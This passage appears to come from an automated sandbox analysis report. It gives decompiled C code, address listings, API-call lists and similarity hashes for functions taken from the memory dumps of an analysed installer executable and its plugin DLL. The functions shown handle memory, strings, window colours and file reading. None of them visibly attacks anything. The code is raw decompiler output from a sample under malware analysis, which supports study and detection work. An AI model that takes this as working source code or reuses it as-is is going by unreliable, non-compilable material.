					_t37 = E72E412CC(0x72e45044);
					goto L10;
				}
			}











                                                                                                                                                                          0x72e42494
                                                                                                                                                                          0x72e42498
                                                                                                                                                                          0x72e424a3
                                                                                                                                                                          0x72e424a3
                                                                                                                                                                          0x72e424aa
                                                                                                                                                                          0x72e424af
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e424b3
                                                                                                                                                                          0x72e424b6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e424bb
                                                                                                                                                                          0x72e424c6
                                                                                                                                                                          0x72e424d6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e424cd
                                                                                                                                                                          0x72e424cf
                                                                                                                                                                          0x72e424e5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e424e5
                                                                                                                                                                          0x72e424bd
                                                                                                                                                                          0x72e424bd
                                                                                                                                                                          0x72e424e6
                                                                                                                                                                          0x72e424e6
                                                                                                                                                                          0x72e424e8
                                                                                                                                                                          0x72e424ec
                                                                                                                                                                          0x72e424ec
                                                                                                                                                                          0x72e424ef
                                                                                                                                                                          0x72e424ef
                                                                                                                                                                          0x72e424f7
                                                                                                                                                                          0x72e424ff
                                                                                                                                                                          0x72e42502
                                                                                                                                                                          0x72e425c1
                                                                                                                                                                          0x72e425c2
                                                                                                                                                                          0x72e425cd
                                                                                                                                                                          0x72e425f7
                                                                                                                                                                          0x72e425f7
                                                                                                                                                                          0x72e425dd
                                                                                                                                                                          0x72e425e9
                                                                                                                                                                          0x72e425df
                                                                                                                                                                          0x72e425df
                                                                                                                                                                          0x72e425df
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42508
                                                                                                                                                                          0x72e42508
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4250f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42517
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42525
                                                                                                                                                                          0x72e42527
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42548
                                                                                                                                                                          0x72e4254e
                                                                                                                                                                          0x72e42551
                                                                                                                                                                          0x72e42553
                                                                                                                                                                          0x72e42563
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42530
                                                                                                                                                                          0x72e42535
                                                                                                                                                                          0x72e42538
                                                                                                                                                                          0x72e42539
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4256f
                                                                                                                                                                          0x72e42575
                                                                                                                                                                          0x72e42576
                                                                                                                                                                          0x72e42579
                                                                                                                                                                          0x72e4257a
                                                                                                                                                                          0x72e4257c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42588
                                                                                                                                                                          0x72e4258b
                                                                                                                                                                          0x72e42597
                                                                                                                                                                          0x72e42599
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e425a5
                                                                                                                                                                          0x72e425b1
                                                                                                                                                                          0x72e425b4
                                                                                                                                                                          0x72e425b6
                                                                                                                                                                          0x72e425b9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42508
                                                                                                                                                                          0x72e42502
                                                                                                                                                                          0x72e424db
                                                                                                                                                                          0x72e424e0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e424e0

                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 72E425C2
                                                                                                                                                                            • Part of subcall function 72E412CC: lstrcpynW.KERNEL32(00000000,?,72E4137F,00000019,72E411CA,-000000A0), ref: 72E412DC
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 72E42548
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 72E42563
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.408336316.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.408319285.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408347758.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408359638.0000000072E46000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                          • String ID: @ht$@u0t
                                                                                                                                                                          • API String ID: 4216380887-838270869
                                                                                                                                                                          • Opcode ID: 868153628b160eaf542f41b72db6d4742112c2716e60ef449781f50669a63aa7
                                                                                                                                                                          • Instruction ID: 2f11ca6562e1a92212f002e95d1d80df7c8acbe47e28e49826929b816a69b58a
                                                                                                                                                                          • Opcode Fuzzy Hash: 868153628b160eaf542f41b72db6d4742112c2716e60ef449781f50669a63aa7
                                                                                                                                                                          • Instruction Fuzzy Hash: 8541CCB5108305DFD7149F29F850A2A7BF8FB84314F60E91EF9468B181EF34A491CB62
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 72E42655, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                          			E72E42655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E72E412BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M72E42784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x72e4407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x72e4409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E72E41510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x72e4506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x72e4506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x72e4506c);
								goto L17;
							case 5:
								_push( *0x72e4506c);
								_push(__edi);
								_push( *__eax);
								" {0t@u0t"();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x72e45000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E72E41381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E72E41312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}











                                                                                                                                                                          0x72e4265f
                                                                                                                                                                          0x72e42661
                                                                                                                                                                          0x72e42665
                                                                                                                                                                          0x72e42674
                                                                                                                                                                          0x72e42678
                                                                                                                                                                          0x72e4267d
                                                                                                                                                                          0x72e4267d
                                                                                                                                                                          0x72e42685
                                                                                                                                                                          0x72e4268c
                                                                                                                                                                          0x72e42692
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42699
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e426a1
                                                                                                                                                                          0x72e426a5
                                                                                                                                                                          0x72e426a8
                                                                                                                                                                          0x72e426ac
                                                                                                                                                                          0x72e426b3
                                                                                                                                                                          0x72e426b7
                                                                                                                                                                          0x72e426bd
                                                                                                                                                                          0x72e426bf
                                                                                                                                                                          0x72e426c1
                                                                                                                                                                          0x72e426c1
                                                                                                                                                                          0x72e426c8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e426d1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e426d8
                                                                                                                                                                          0x72e426de
                                                                                                                                                                          0x72e426e8
                                                                                                                                                                          0x72e426ee
                                                                                                                                                                          0x72e426f3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42714
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e426fa
                                                                                                                                                                          0x72e42700
                                                                                                                                                                          0x72e42701
                                                                                                                                                                          0x72e42703
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4271c
                                                                                                                                                                          0x72e4271e
                                                                                                                                                                          0x72e42724
                                                                                                                                                                          0x72e4272a
                                                                                                                                                                          0x72e4272a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42692
                                                                                                                                                                          0x72e4272d
                                                                                                                                                                          0x72e4272d
                                                                                                                                                                          0x72e42732
                                                                                                                                                                          0x72e42743
                                                                                                                                                                          0x72e42743
                                                                                                                                                                          0x72e42749
                                                                                                                                                                          0x72e4274e
                                                                                                                                                                          0x72e42753
                                                                                                                                                                          0x72e4275f
                                                                                                                                                                          0x72e42764
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e42769
                                                                                                                                                                          0x72e42755
                                                                                                                                                                          0x72e42756
                                                                                                                                                                          0x72e4276a
                                                                                                                                                                          0x72e4276a
                                                                                                                                                                          0x72e42753
                                                                                                                                                                          0x72e4276b
                                                                                                                                                                          0x72e4276c
                                                                                                                                                                          0x72e4276f
                                                                                                                                                                          0x72e42783

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 72E412BB: GlobalAlloc.KERNEL32(00000040,?,72E412DB,?,72E4137F,00000019,72E411CA,-000000A0), ref: 72E412C5
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 72E42743
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 72E42778
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.408336316.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.408319285.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408347758.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408359638.0000000072E46000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                          • String ID: {0t@u0t
                                                                                                                                                                          • API String ID: 1780285237-991103260
                                                                                                                                                                          • Opcode ID: bce9967f2c7d9529c3c750964fdd51db5115353047833b0f34b4a685b3b1c14b
                                                                                                                                                                          • Instruction ID: c1e811c7c99adc3a3a2e546d9071ba5d17dc2e2912855d90d97fa9d3a78681e3
                                                                                                                                                                          • Opcode Fuzzy Hash: bce9967f2c7d9529c3c750964fdd51db5115353047833b0f34b4a685b3b1c14b
                                                                                                                                                                          • Instruction Fuzzy Hash: AA31E476604101DFCB178F59E988E2E7BFAFB85348360E92DF50187150CF306866DB62
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00404500, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                                                                                                          0x00404512
                                                                                                                                                                          0x004045c8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004045c8
                                                                                                                                                                          0x00404523
                                                                                                                                                                          0x00404527
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404541
                                                                                                                                                                          0x00404541
                                                                                                                                                                          0x0040454a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040454c
                                                                                                                                                                          0x00404558
                                                                                                                                                                          0x0040455b
                                                                                                                                                                          0x0040455b
                                                                                                                                                                          0x00404561
                                                                                                                                                                          0x00404567
                                                                                                                                                                          0x00404567
                                                                                                                                                                          0x00404573
                                                                                                                                                                          0x00404579
                                                                                                                                                                          0x00404580
                                                                                                                                                                          0x00404583
                                                                                                                                                                          0x00404586
                                                                                                                                                                          0x00404588
                                                                                                                                                                          0x00404588
                                                                                                                                                                          0x00404590
                                                                                                                                                                          0x00404596
                                                                                                                                                                          0x00404596
                                                                                                                                                                          0x004045a0
                                                                                                                                                                          0x004045a5
                                                                                                                                                                          0x004045a8
                                                                                                                                                                          0x004045ad
                                                                                                                                                                          0x004045b0
                                                                                                                                                                          0x004045b0
                                                                                                                                                                          0x004045c0
                                                                                                                                                                          0x004045c0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004045c3

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00404586
                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004045B0
                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                          • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                          • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                                                                                                                          • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                          • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004026EC, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                          			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                                                                                                                          0x004026ec
                                                                                                                                                                          0x004026ee
                                                                                                                                                                          0x004026f1
                                                                                                                                                                          0x004026f3
                                                                                                                                                                          0x004026f6
                                                                                                                                                                          0x004026fb
                                                                                                                                                                          0x004026ff
                                                                                                                                                                          0x00402702
                                                                                                                                                                          0x00402705
                                                                                                                                                                          0x00402c2a
                                                                                                                                                                          0x00402c2d
                                                                                                                                                                          0x0040270b
                                                                                                                                                                          0x0040270b
                                                                                                                                                                          0x00402712
                                                                                                                                                                          0x00402714
                                                                                                                                                                          0x00402714
                                                                                                                                                                          0x0040271a
                                                                                                                                                                          0x0040287e
                                                                                                                                                                          0x0040287e
                                                                                                                                                                          0x00402881
                                                                                                                                                                          0x00402886
                                                                                                                                                                          0x004015b6
                                                                                                                                                                          0x0040292e
                                                                                                                                                                          0x0040292e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00402720
                                                                                                                                                                          0x00402721
                                                                                                                                                                          0x0040272c
                                                                                                                                                                          0x0040272f
                                                                                                                                                                          0x0040273b
                                                                                                                                                                          0x0040273f
                                                                                                                                                                          0x004027d7
                                                                                                                                                                          0x004027ef
                                                                                                                                                                          0x004027ff
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00402745
                                                                                                                                                                          0x00402745
                                                                                                                                                                          0x00402748
                                                                                                                                                                          0x00402749
                                                                                                                                                                          0x0040274c
                                                                                                                                                                          0x00402751
                                                                                                                                                                          0x00402758
                                                                                                                                                                          0x00402760
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00402766
                                                                                                                                                                          0x00402766
                                                                                                                                                                          0x0040276b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00402771
                                                                                                                                                                          0x00402771
                                                                                                                                                                          0x00402779
                                                                                                                                                                          0x0040277c
                                                                                                                                                                          0x0040277f
                                                                                                                                                                          0x0040283a
                                                                                                                                                                          0x00402841
                                                                                                                                                                          0x00402785
                                                                                                                                                                          0x0040278b
                                                                                                                                                                          0x00402797
                                                                                                                                                                          0x00402801
                                                                                                                                                                          0x00402801
                                                                                                                                                                          0x00402799
                                                                                                                                                                          0x00402799
                                                                                                                                                                          0x0040279c
                                                                                                                                                                          0x0040279e
                                                                                                                                                                          0x0040279e
                                                                                                                                                                          0x0040279e
                                                                                                                                                                          0x004027a1
                                                                                                                                                                          0x004027a6
                                                                                                                                                                          0x004027a9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004027ab
                                                                                                                                                                          0x004027ae
                                                                                                                                                                          0x004027bc
                                                                                                                                                                          0x004027c2
                                                                                                                                                                          0x004027d0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004027d2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004027d2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004027d0
                                                                                                                                                                          0x0040279e
                                                                                                                                                                          0x00402804
                                                                                                                                                                          0x00402807
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00402809
                                                                                                                                                                          0x0040280e
                                                                                                                                                                          0x0040284f
                                                                                                                                                                          0x00402871
                                                                                                                                                                          0x00402878
                                                                                                                                                                          0x0040285d
                                                                                                                                                                          0x0040285d
                                                                                                                                                                          0x00402860
                                                                                                                                                                          0x00402863
                                                                                                                                                                          0x00402866
                                                                                                                                                                          0x00402866
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00402817
                                                                                                                                                                          0x00402817
                                                                                                                                                                          0x0040281a
                                                                                                                                                                          0x0040281d
                                                                                                                                                                          0x00402823
                                                                                                                                                                          0x00402827
                                                                                                                                                                          0x0040282a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040282a
                                                                                                                                                                          0x0040280e
                                                                                                                                                                          0x00402807
                                                                                                                                                                          0x0040277f
                                                                                                                                                                          0x0040276b
                                                                                                                                                                          0x00402760
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040282c
                                                                                                                                                                          0x0040282c
                                                                                                                                                                          0x0040282f
                                                                                                                                                                          0x00402838
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040272f
                                                                                                                                                                          0x0040271a
                                                                                                                                                                          0x00402c33
                                                                                                                                                                          0x00402c39

                                                                                                                                                                          APIs
                                                                                                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                                                            • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                          • String ID: 9
                                                                                                                                                                          • API String ID: 163830602-2366072709
                                                                                                                                                                          • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                                                                          • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                                                                                                                          • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                                                                          • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004067C4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                          			E004067C4(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

